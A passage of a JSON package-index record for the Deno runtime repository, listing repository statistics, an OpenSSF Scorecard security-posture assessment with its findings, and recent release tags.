go get github.com/Denoland/deno","documentation_url":"https://pkg.go.dev/github.com/Denoland/deno#section-documentation","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36842515,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-23T02:00:05.822Z","response_time":128,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg: